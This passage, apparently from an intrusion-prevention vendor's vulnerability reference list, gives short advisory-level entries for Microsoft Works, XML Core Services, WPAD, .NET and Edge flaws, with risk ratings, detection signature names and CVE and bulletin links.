Situation: HTTP_SS-Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
File-OLE_Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
References:
CVE-2007-0216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0216
BID-27657
http://www.securityfocus.com/bid/27657
MS08-011
http://technet.microsoft.com/security/bulletin/MS08-011
Back to top

Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability

About this vulnerability: Microsoft Works WkImgSrv.dll ActiveX Vulnerability
Risk: Low
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Works; Microsoft Office 2003; Microsoft Office 2007
Type: Malfunction
Description: A vulnerability exists in an ActiveX control in WkImgSrv.dll 7.03.0616.0 which allows a remote attacker to execute arbitrary code or cause a denial of service.
Situation: File-Text_Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability
References:
CVE-2008-1898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1898
BID-28820
http://www.securityfocus.com/bid/28820
OSVDB-44458
http://www.osvdb.org/44458
Back to top

Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A vulnerbility in Microsoft Windows Server, versions 7, 8.1, 10, RT 8.1, Vista; 2008, 2008 R2, 2012, 2012 R2, In Web Proxy Automatic Discovery (WPAD), which allows remote attackers to bypass security and elevate privileges by responding to a NetBios name request.
Situation: Generic_UDP-Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation
References:
CVE-2016-3213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213
MS16-077
http://technet.microsoft.com/security/bulletin/MS16-077
Back to top

Microsoft-WPS-Converter-Heap-Overflow-Vulnerability

About this vulnerability: An attempt to exploit Microsoft Office vulnerability CVE-2012-0177
Risk: Moderate
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Works
Type: Buffer Overflow
Description: An attempt to exploit Microsoft Office vulnerability CVE-2012-0177
Situation: File-OLE_Microsoft-WPS-Converter-Heap-Overflow-Vulnerability
References:
CVE-2012-0177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0177
BID-52867
http://www.securityfocus.com/bid/52867
OSVDB-81134
http://www.osvdb.org/81134
MS12-028
http://technet.microsoft.com/security/bulletin/MS12-028
Back to top

Microsoft-WSDAPI-Memory-Corruption-MS09-063

About this vulnerability: A vulnerability in Microsoft Web Services on Devices API
Risk: High
First detected in: sgpkg-ips-264-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2008
Software: <os>
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in Microsoft Web Services on Devices API (WSDAPI).
Situation: HTTP_CSH-Microsoft-WSDAPI-Memory-Corruption-MS09-063
Generic_CS-Microsoft-WSDAPI-Memory-Corruption-MS09-063
References:
CVE-2009-2512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2512
BID-36919
http://www.securityfocus.com/bid/36919
MS09-063
http://technet.microsoft.com/security/bulletin/MS09-063
Back to top

Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft XML Core Services. The vulnerability is due to the way Microsoft XML Core Services improperly parses XML content. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to visit a specially crafted website. Successful exploitation could allow arbitrary code execution in the context of current user.
Situation: File-TextId_Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption
References:
CVE-2014-4118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4118
BID-70957
http://www.securityfocus.com/bid/70957
OSVDB-114531
http://www.osvdb.org/114531
MS14-067
http://technet.microsoft.com/security/bulletin/MS14-067
Back to top

Microsoft-XML-Core-Services-CVE-2017-0024

About this vulnerability: A vulnerability in Microsoft XML Core Services
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft XML Core Services
Situation: File-Text_Microsoft-XML-Core-Services-CVE-2017-0024
References:
CVE-2017-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0022
MS17-014
http://technet.microsoft.com/security/bulletin/MS17-014
Back to top

Microsoft-Xml-Core-Services-Integer-Truncation-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft XML Core Services
Risk: High
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft XML Core Services
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft XML Core Services. The vulnerability is due to an integer truncation error while Microsoft XML Core Services parses XML content. Remote attackers could exploit this vulnerability by persuading a target user to visit a specially crafted website. Successful exploitation could allow arbitrary code execution in the context of current user.
Situation: File-Text_Microsoft-Xml-Core-Services-Vulnerable-ActiveX-Control
References:
CVE-2013-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0006
BID-57116
http://www.securityfocus.com/bid/57116
OSVDB-88959
http://www.osvdb.org/88959
MS13-002
http://technet.microsoft.com/security/bulletin/MS13-002
Back to top

Microsoft-XML-Core-Services-Memory-Corruption-CVE-2010-2561

About this vulnerability: A memory corruption vulnerability in Microsoft XML Core Services
Risk: Critical
First detected in: sgpkg-ips-331-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft XML Core Services. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-Core-Services-Memory-Corruption-CVE-2010-2561
HTTP_SHS-Core-Services-Memory-Corruption-CVE-2010-2561
References:
CVE-2010-2561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2561
BID-42300
http://www.securityfocus.com/bid/42300
MS10-051
http://technet.microsoft.com/security/bulletin/MS10-051
Back to top

Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure

About this vulnerability: An information disclosure vulnerability in Microsoft Microsoft XML Core Services
Risk: Moderate
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft XML Core Services
Type: Malfunction
Description: There is an information disclosure vulnerability in the Microsoft XML Core Services component. The vulnerability is due to a failure in the functionality of same origin policy. The component handles certain request headers incorrectly. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attackers to access the contents of a web page belonging to a different domain and cause information disclosure.
Situation: HTTP_CS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
HTTP_SS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
File-Text_Microsoft-Xml-Core-Services-Msxml-Header-Information-Disclosure
References:
CVE-2008-4033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4033
BID-32204
http://www.securityfocus.com/bid/32204
MS08-069
http://technet.microsoft.com/security/bulletin/MS08-069
Back to top

Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure

About this vulnerability: An information disclosure vulnerability in Microsoft XML Core Services
Risk: Moderate
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft XML Core Services
Type: Input Validation
Description: There is an information disclosure vulnerability in Microsoft XML Core Services. The vulnerability is caused by a design flaw in the way Microsoft XML Core Services handle error checks for external XML Document Type Definition (DTD) files. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attackers to access contents of a web page belonging to a different domain and cause the information disclosure.
Situation: HTTP_SS-Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure
File-Text_Microsoft-Xml-Core-Services-ParseError-DOM-Object-Disclosure
References:
CVE-2008-4029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4029
BID-32155
http://www.securityfocus.com/bid/32155
MS08-069
http://technet.microsoft.com/security/bulletin/MS08-069
Back to top

Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Microsoft XML Core Services detected
Risk: High
First detected in: sgpkg-ips-458-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft XML Core Services;Internet Explorer
Type: Malfunction
Description: There is a vulnerability in Microsoft XML Core Services that could allow remote code execution.
Situation: File-Text_Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability
References:
CVE-2012-1889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889
BID-53934
http://www.securityfocus.com/bid/53934
OSVDB-82873
http://www.osvdb.org/82873
MS12-043
http://technet.microsoft.com/security/bulletin/MS12-043
Back to top

Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280

About this vulnerability: A vulnerability in Microsoft XML Editor
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft InfoPath 2007; Microsoft SQL Server 2005; Microsoft SQL Server 2008; Microsoft Visual Studio 2008
Type: Input Validation
Description: There is a vulnerability in Microsoft XML Editor.
Situation: HTTP_SS-Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
File-TextId_Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
References:
CVE-2011-1280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1280
BID-48196
http://www.securityfocus.com/bid/48196
MS11-049
http://technet.microsoft.com/security/bulletin/MS11-049
Back to top

Microsoft-XMLHTTP-ActiveX-Control-Code-Execution

About this vulnerability: Code execution vulnerability in the XMLHTTP ActiveX Control included with Microsoft XML Core Services
Risk: High
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft XML Core Services
Type: Malfunction
Description: There is a code execution vulnerability in the XMLHTTP ActiveX Control included with Microsoft XML Core Services. A remote attacker can exploit the vulnerability by enticing a user to visit a malicious web page with a vulnerable version of the affected product installed to execute non-privileged arbitrary code on the user's system.
Situation: HTTP_SS-Microsoft-XMLHTTP-ActiveX-Control-Code-Execution
References:
CVE-2006-5745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5745
BID-20915
http://www.securityfocus.com/bid/20915
MS06-071
http://technet.microsoft.com/security/bulletin/MS06-071
Back to top

Microsoft.NET-Iriparsing-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in Microsoft .NET Framework. The vulnerability is due to the way that internationalized resource identifiers (Iri) is processed. A remote attacker could exploit this vulnerability by sending a malicious request to the target server. Successful exploitation could result in arbitrary code execution in the security context in which the .NET application runs.
Situation: HTTP_CRL-Microsoft.NET-Iriparsing-Remote-Code-Execution
References:
CVE-2014-4121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4121
BID-70351
http://www.securityfocus.com/bid/70351
OSVDB-113185
http://www.osvdb.org/113185
MS14-057
http://technet.microsoft.com/security/bulletin/MS14-057
Back to top

Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810
References:
CVE-2019-0810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0810
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812
References:
CVE-2019-0812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0812
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860
References:
CVE-2019-0860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0860
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592
References:
CVE-2019-0592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0592
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770
References:
CVE-2019-0770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0770
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771
References:
CVE-2019-0771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0771
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990
References:
CVE-2019-0990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0990
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002
References:
CVE-2019-1002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1002
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in information disclosure.
Situation: File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023
References:
CVE-2019-1023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1023
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a security bypass vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612
References:
CVE-2019-0612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0612
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639
References:
CVE-2019-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0639
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769
References:
CVE-2019-0769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0769
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773
References:
CVE-2019-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0773
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829
References:
CVE-2019-0829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0829
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911
References:
CVE-2019-0911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0911
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989
References:
CVE-2019-0989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0989
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991
References:
CVE-2019-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0991
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992
References:
CVE-2019-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0992
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993
References:
CVE-2019-0993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0993
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003
References:
CVE-2019-1003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024
References:
CVE-2019-1024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1024
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051
References:
CVE-2019-1051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1051
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139
References:
CVE-2019-1139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1139
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140
References:
CVE-2019-1140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1140
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141
References:
CVE-2019-1141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1141
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195
References:
CVE-2019-1195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1195
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196
References:
CVE-2019-1196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1196
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197
References:
CVE-2019-1197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1197
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307
References:
CVE-2019-1307
